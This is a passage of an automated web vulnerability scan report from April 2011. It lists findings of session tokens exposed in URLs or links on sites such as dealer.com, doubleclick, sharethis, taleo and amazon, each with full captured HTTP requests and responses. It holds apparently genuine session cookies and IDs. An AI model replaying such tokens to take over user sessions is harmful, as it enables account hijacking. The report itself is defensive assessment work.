User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.2b1bc27e5d9811e08af9616a40ee2636.cf55; VWCUKP300=L123100/Q68712_13124_135_040211_1_040311_424842x423979x040211x1x1; s_vi=[CS]v1|26CBEC11051D3387-6000010340009A75[CE]; s_pers=%20s_getnr%3D1303045102168-Repeat%7C1366117102168%3B%20s_nrgvo%3DRepeat%7C1366117102169%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcmp%252Caolsvc%253D%252526pid%25253Dcmp%2525253A%25252520Discover%25252520%2525257C%25252520Internet%25252520Security%25252520Central%2525253ACCU%252526pidt%25253D1%252526oid%25253Djavascript%2525253AohSnapcloud%25252528%25252527pc-tools-and-storage%25252527%2525252C%25252520%25252527aol-computer-checkup-1%25252527%25252529%2525253B%252526ot%25253DA%3B; JSESSIONID=ECB401B40469871F10689692AE99A374.storefrontus-m04a; OFBiz.Visitor=1073819

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 17 Apr 2011 12:58:29 GMT
Location: https://aolproductcentral.aol.com/control/checkout?categoryId=pc-tools-and-storage&brandName=aol-computer-checkup-1
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Keep-Alive: timeout=20, max=500
Connection: Keep-Alive


9.3. http://bh.contextweb.com/bh/set.aspx

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /bh/set.aspx?action=add&advid=1443&token=NETM7 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://housecall.trendmicro.com/us/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pb_rtb_ev=1:531399.1iolb30nur9ak.0|535495.97552ab6-5d98-11e0-8434-0025900a8ffe.1|535461.4608069584519221037.1|535039.bf0d68cb-2449-4e5d-8b20-461d8ec850c3.1|531292.CG-00000001131071922.1; C2W4=3x1f-Ps9Yhy3ydw-2vbkHY4Vj-8mDoMxIgKRGAlDwhIQOU6J7b35caw; cr=111|5|-8588990505152210454|1; V=wOEFmQuIafIS

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
CW-Server: cw-web82
Set-Cookie: V=wOEFmQuIafIS; Domain=.contextweb.com; Expires=Wed, 11-Apr-2012 12:56:51 GMT; Path=/
Set-Cookie: cwbh1=1443%3B05%2F17%2F2011%3BNETM7; Domain=.contextweb.com; Expires=Mon, 21-Mar-2016 12:56:51 GMT; Path=/
Content-Type: image/gif
Date: Sun, 17 Apr 2011 12:56:51 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

9.4. http://cc.dealer.com/views/login

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://cc.dealer.com
Path:   /views/login

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /views/login?sessionTimedOut=true HTTP/1.1
Host: cc.dealer.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerCC5Pool=2650869258.20480.0000; BIGipServerSecureCC5Pool=2650869258.20736.0000; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.36.10.1303002182

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.3 (CentOS)
Location: https://cc.dealer.com/views/login?sessionTimedOut=true
Content-Length: 238
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:11:39 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://cc.dealer.com/views/login?sessionTimedOut=true">here</a>
...[SNIP]...

9.5. http://cc.dealer.com/views/login

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://cc.dealer.com
Path:   /views/login

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /views/login?sessionTimedOut=true HTTP/1.1
Host: cc.dealer.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerCC5Pool=2650869258.20480.0000; BIGipServerSecureCC5Pool=2650869258.20736.0000; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.36.10.1303002182

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.3 (CentOS)
Location: https://cc.dealer.com/views/login?sessionTimedOut=true
Content-Length: 238
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:11:39 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://cc.dealer.com/views/login?sessionTimedO
...[SNIP]...

9.6. https://cc.dealer.com/views/login

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://cc.dealer.com
Path:   /views/login

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /views/login?sessionTimedOut=true HTTP/1.1
Host: cc.dealer.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerCC5Pool=2650869258.20480.0000; BIGipServerSecureCC5Pool=2650869258.20736.0000; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.36.10.1303002182

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:11:41 GMT
Connection: keep-alive
Content-Length: 11402

<html>
<head>
   <meta http-equiv="Content-type" content="text/html; charset=utf-8" />
   <title>Dealer.com Login</title>

   <script src="https://cc2.dealer.com/javascript/md5.js?1276795935000" language="j
...[SNIP]...

9.7. http://fls.doubleclick.net/activityi

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /activityi;src=1405043;type=onlin776;cat=webro874;ord=1;num=3297651645261.7944? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.webroot.com/En_US/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Sun, 17 Apr 2011 13:00:48 GMT
Expires: Sun, 17 Apr 2011 13:00:48 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 719

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><script src="http://
...[SNIP]...
<img src='http://a.rfihub.com/ca.gif?rb=769&ca=20472967&ct=894059542' height=0 width=0 style='display:none' alt='Rocket Fuel'/><img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=2909&token=WBSW1" width="1" height="1" border="0"></body>
...[SNIP]...

9.8. http://l.sharethis.com/pview

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://l.sharethis.com
Path:   /pview

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /pview?event=pview&publisher=94185b39-ee6d-4902-8b14-ecd540977f9a&hostname=housecall.trendmicro.com&location=%2Fus%2Findex.html&url=http%3A%2F%2Fhousecall.trendmicro.com%2Fus%2Findex.html&sessionID=1303044921690.28305&fpc=e9c3bfd-12f6387996e-57bee0f8-1&ts1303044926993.0&r_sessionID=&hash_flag=&shr=&count=1 HTTP/1.1
Host: l.sharethis.com
Proxy-Connection: keep-alive
Referer: http://housecall.trendmicro.com/us/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 204 No Content
Server: nginx/0.7.65
Date: Sun, 17 Apr 2011 12:57:09 GMT
Connection: keep-alive
Set-Cookie: __stid=CszLBk2q46UTLgrkOxpkAg==; expires=Mon, 16-Apr-12 12:57:09 GMT; domain=.sharethis.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"


9.9. http://mbox9e.offermatica.com/m2/eset/mbox/standard

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mbox9e.offermatica.com
Path:   /m2/eset/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/eset/mbox/standard?mboxHost=www.eset.com&mboxSession=1303045152447-372951&mboxPage=1303045152447-372951&mboxCount=1&mbox=mbx_company_landing&mboxId=0&mboxTime=1303027152504&mboxURL=http%3A%2F%2Fwww.eset.com%2Fus%2Fcompany&mboxReferrer=&mboxVersion=37 HTTP/1.1
Host: mbox9e.offermatica.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/company
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 174
Date: Sun, 17 Apr 2011 12:59:15 GMT
Server: Test & Target

mboxFactories.get('default').get('mbx_company_landing',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1303045152447-372951.17");

9.10. http://tbe.taleo.net/NA8/ats/careers/jobSearch.jsp

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://tbe.taleo.net
Path:   /NA8/ats/careers/jobSearch.jsp

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /NA8/ats/careers/jobSearch.jsp?org=QUALYS&cws=7 HTTP/1.1
Host: tbe.taleo.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 13:04:30 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Set-Cookie: JSESSIONID=EBC74150942B2F30DFBB4F71860DE058.NA8_primary_jvm; Path=/NA8/ats
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 12210


<html><head><title>Career Opportunities</title></head><body>
<STYLE type="text/css">
body {
padding: 15px;
font-family: Verdana;
font-siz
...[SNIP]...
<br>To fill out a general application form <a tabIndex='29' href='http://tbe.taleo.net/NA8/ats/careers/apply.jsp;jsessionid=EBC74150942B2F30DFBB4F71860DE058.NA8_primary_jvm?org=QUALYS&cws=7'>click here</a>
...[SNIP]...

9.11. http://webroot.tt.omtrdc.net/m2/webroot/mbox/standard

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://webroot.tt.omtrdc.net
Path:   /m2/webroot/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/webroot/mbox/standard?mboxHost=www.webroot.com&mboxSession=1303044923199-20205&mboxPage=1303044923199-20205&screenHeight=1200&screenWidth=1920&browserWidth=1079&browserHeight=1016&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=US-land-ss-promo-freescan-pagewrap&mboxId=0&mboxTime=1303026923509&mboxURL=http%3A%2F%2Fwww.webroot.com%2FEn_US%2Fland-ss-promo-freescan.html&mboxReferrer=&mboxVersion=39 HTTP/1.1
Host: webroot.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.webroot.com/En_US/land-ss-promo-freescan.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DSP CURa OUR STP COM"
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxSession=1303044923199-20205; Domain=webroot.tt.omtrdc.net; Expires=Sun, 17-Apr-2011 13:27:57 GMT; Path=/m2/webroot
Set-Cookie: mboxPC=1303044923199-20205.17; Domain=webroot.tt.omtrdc.net; Expires=Mon, 17-Oct-2011 12:56:57 GMT; Path=/m2/webroot
Content-Length: 0
Date: Sun, 17 Apr 2011 12:56:57 GMT
Location: http://webroot.tt.omtrdc.net/m2/webroot/mbox/standard?mboxHost=www.webroot.com&mboxSession=1303044923199-20205&mboxPage=1303044923199-20205&screenHeight=1200&screenWidth=1920&browserWidth=1079&browserHeight=1016&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=US-land-ss-promo-freescan-pagewrap&mboxId=0&mboxTime=1303026923509&mboxURL=http%3A%2F%2Fwww.webroot.com%2FEn_US%2Fland-ss-promo-freescan.html&mboxReferrer=&mboxVersion=39&mboxXDomainCheck=true
Server: Test & Target


9.12. http://www.amazon.com/gp/product/0975264001

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /gp/product/0975264001

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /gp/product/0975264001 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:20:47 GMT
Server: Server
x-amz-id-1: 0TMV7GTM9VSZ67NKEV0Q
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: Z0pe41aEyeyhR8T39bmBtjpiPqfY6Jdj2lpjTDa9VnaHLF1JmNVi1YJWUNfkEp1R
Vary: Accept-Encoding,User-Agent
Cneonction: close
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=177-9706368-2622212; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 411638


<html>
<head>


<style type="text/css"><!--


BODY
...[SNIP]...
</a><a href="/gp/redirect.html/ref=cm_sw_cl_fa_dp_aDVQnb0M7T9S6?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&amp;location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fdp%2F0975264001%2Fref%3Dcm_sw_r_fa_dp_aDVQnb0M7T9S6%26bodytext%3DThe%2520Hedonist%253A%2520World%2520Vacation%2520Guide%2520by%2520Brett%2520Tate" target="_blank" class="tafSocialLink" onclick="window.open('/gp/redirect.html/ref=cm_sw_cl_fa_dp_aDVQnb0M7T9S6?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fdp%2F0975264001%2Fref%3Dcm_sw_r_fa_dp_aDVQnb0M7T9S6%26bodytext%3DThe%2520Hedonist%253A%2520World%2520Vacation%2520Guide%2520by%2520Brett%2520Tate', '_blank', 'location=yes,width=700,height=400');return false;"><span class="tafSocialButton" style="background-position: -18px 0px; height: 16px; width: 16px;;">
...[SNIP]...
</a><a href="/gp/redirect.html/ref=cm_sw_cl_tw_dp_aDVQnb0M7T9S6?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&amp;location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252F0975264001%252Fref%253Dcm_sw_r_tw_dp_aDVQnb0M7T9S6%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DThe%2520Hedonist%253A%2520World%2520Vacation%2520Guide%2520by%2520Brett%2520Tate%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fdp%2F0975264001%2Fref%3Dcm_sw_r_tw_dp_aDVQnb0M7T9S6%26count%3Dnone" target="_blank" class="tafSocialLink" onclick="window.open('/gp/redirect.html/ref=cm_sw_cl_tw_dp_aDVQnb0M7T9S6?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252F0975264001%252Fref%253Dcm_sw_r_tw_dp_aDVQnb0M7T9S6%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DThe%2520Hedonist%253A%2520World%2520Vacation%2520Guide%2520by%2520Brett%2520Tate%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fdp%2F0975264001%2Fref%3Dcm_sw_r_tw_dp_aDVQnb0M7T9S6%26count%3Dnone', '_blank', 'location=yes,width=700,height=400');return false;"><span class="tafSocialButton" style="background-position: -34px 0px; height: 16px; width: 16px;;">
...[SNIP]...
</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R1827BY2UKT0ZQ/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=8D0D078695A3751F014EB38018534998BE23FD97&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDk3NTI2NDAwMS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZpc1NSQWRtaW49&voteAnchorName=R1827BY2UKT0ZQ.2115.Helpful.Reviews&voteSessionID=177-9706368-2622212"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R1827BY2UKT0ZQ/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=68C210B64381B8F21797058DFF903E77FC4865E8&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDk3NTI2NDAwMS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZpc1NSQWRtaW49&voteAnchorName=R1827BY2UKT0ZQ.2115.Helpful.Reviews&voteSessionID=177-9706368-2622212"><span class="cmtySprite s_largeNo " >
...[SNIP]...
<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R1827BY2UKT0ZQ/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=45DDDDEA0F6D248EDBB48E5A66D6BBDF70D309B0&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDk3NTI2NDAwMS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZpc1NSQWRtaW49&voteAnchorName=R1827BY2UKT0ZQ.2115.Inappropriate.Reviews&voteSessionID=177-9706368-2622212"
>
Report abuse</a>
...[SNIP]...
</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R3EFITEKISH5O/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=75A3BD8AD998CB31E337FF93EF9CCF37E4B784C8&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDk3NTI2NDAwMS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZpc1NSQWRtaW49&voteAnchorName=R3EFITEKISH5O.2115.Helpful.Reviews&voteSessionID=177-9706368-2622212"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R3EFITEKISH5O/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=F09BAA8BE60C0E979C3B694D7F235E721428A4F3&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDk3NTI2NDAwMS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZpc1NSQWRtaW49&voteAnchorName=R3EFITEKISH5O.2115.Helpful.Reviews&voteSessionID=177-9706368-2622212"><span class="cmtySprite s_largeNo " >
...[SNIP]...
<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R3EFITEKISH5O/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=94B0145DA5841383AE88248D6323F4C51C3987F5&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDk3NTI2NDAwMS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZpc1NSQWRtaW49&voteAnchorName=R3EFITEKISH5O.2115.Inappropriate.Reviews&voteSessionID=177-9706368-2622212"
>
Report abuse</a>
...[SNIP]...
</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R1IC0DFKZVM0CI/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=C25A422920C258E1A3AB45577532F512C44813C4&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDk3NTI2NDAwMS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZpc1NSQWRtaW49&voteAnchorName=R1IC0DFKZVM0CI.2115.Helpful.Reviews&voteSessionID=177-9706368-2622212"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R1IC0DFKZVM0CI/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=6E3B9B58157E8207A1225D87F347305DDC0B9DAD&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDk3NTI2NDAwMS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZpc1NSQWRtaW49&voteAnchorName=R1IC0DFKZVM0CI.2115.Helpful.Reviews&voteSessionID=177-9706368-2622212"><span class="cmtySprite s_largeNo " >
...[SNIP]...
<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R1IC0DFKZVM0CI/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=C86EF159EDEE368158C3F3284BC995BD6F01D436&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDk3NTI2NDAwMS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZpc1NSQWRtaW49&voteAnchorName=R1IC0DFKZVM0CI.2115.Inappropriate.Reviews&voteSessionID=177-9706368-2622212"
>
Report abuse</a>
...[SNIP]...
<div class="content">
If you are a publisher or author and hold the digital rights to a book, you can sell a digital version of it in our Kindle Store.
<a href="/gp/redirect.html/ref=dtp_dp_lm_0975264001/177-9706368-2622212?location=http://dtp.amazon.com/&amp;token=ED7546842AF86000862C6B4CDB683D114A0EDF07">Learn more</a>
...[SNIP]...
<li><a href="/gp/redirect.html/ref=gw_m_b_ir/177-9706368-2622212?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-irhome%26c%3D97664&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8">Investor Relations</a>
...[SNIP]...
<li><a href="/gp/redirect.html/ref=gw_m_b_pr/177-9706368-2622212?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-mediaHome%26c%3D176060&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8">Press Releases</a>
...[SNIP]...
<li><a href="/gp/redirect.html/177-9706368-2622212?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fsell-on-amazon.htm%3Fld%3DAZFSSOA&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8">Sell on Amazon</a>
...[SNIP]...
<li><a href="/gp/redirect.html/177-9706368-2622212?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fproduct-ads-on-amazon.htm%3Fld%3DAZPADSFooter&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8">Advertise Your Products</a>
...[SNIP]...

9.13. http://www.dzone.com/links/add.html

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.dzone.com
Path:   /links/add.html

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /links/add.html HTTP/1.1
Host: www.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 17 Apr 2011 14:18:30 GMT
Server: Apache/2.2.11 (Unix) DAV/2 SVN/1.5.5 Resin/4.0.4 PHP/5.2.13
Cache-Control: private, max-age=1
Location: http://www.dzone.com/links/login.html;jsessionid=aaaFT2qK8l5LeghP70J9s
Content-Length: 108
Set-Cookie: JSESSIONID=aaaFT2qK8l5LeghP70J9s; path=/
Content-Type: text/html; charset=utf-8
Expires: Sun, 17 Apr 2011 14:18:31 GMT
Vary: Accept-Encoding,User-Agent
Connection: close

The URL has moved <a href="http://www.dzone.com/links/login.html;jsessionid=aaaFT2qK8l5LeghP70J9s">here</a>

9.14. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

